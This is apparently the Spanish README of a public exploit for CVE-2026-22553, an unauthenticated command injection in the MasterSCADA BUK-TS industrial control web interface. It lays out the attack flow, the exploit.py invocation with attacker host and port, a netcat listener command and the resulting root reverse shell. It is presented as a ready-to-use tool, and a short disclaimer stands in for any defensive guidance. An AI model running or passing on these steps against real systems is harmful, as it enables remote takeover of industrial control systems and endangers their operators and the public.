
CVE-2026-22553 | CVSS 9.8 Crítico | Autor del exploit: Mohammed Idrees Banyamer
InSAT MasterSCADA BUK-TS sufre una vulnerabilidad de inyección de comandos del sistema operativo sin autenticación en la interfaz web MMadmServ. Esta falla permite a atacantes remotos lograr ejecución remota completa de código (RCE) sin necesidad de autenticación.
flowchart TD
A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
B -->|Unauthenticated| C[Vulnerable Parameter]
C -->|OS Command Injection| D[Command Execution on Target Server]
D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
style A fill:#ff4d4d,stroke:#fff
style E fill:#4dff88,stroke:#fff
python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>
python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444
| Opción | Descripción |
|---|---|
target | URL del objetivo (p. ej. http://ip:puerto) |
--lhost | Su dirección IP (shell inversa) |
--lport | Su puerto de escucha |
Inicie un listener en su máquina:
nc -lvnp 4444
Ejecute el exploit:
python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
Obtenga una shell inversa con privilegios de root/sistema.
Este exploit se proporciona solo con fines educativos y de pruebas de penetración autorizadas.
El uso no autorizado contra sistemas que no le pertenecen es ilegal y puede violar leyes internacionales.
El autor no es responsable de ningún uso indebido.
Mohammed Idrees Banyamer
¡Dale una estrella ⭐ a este repositorio si te resultó útil!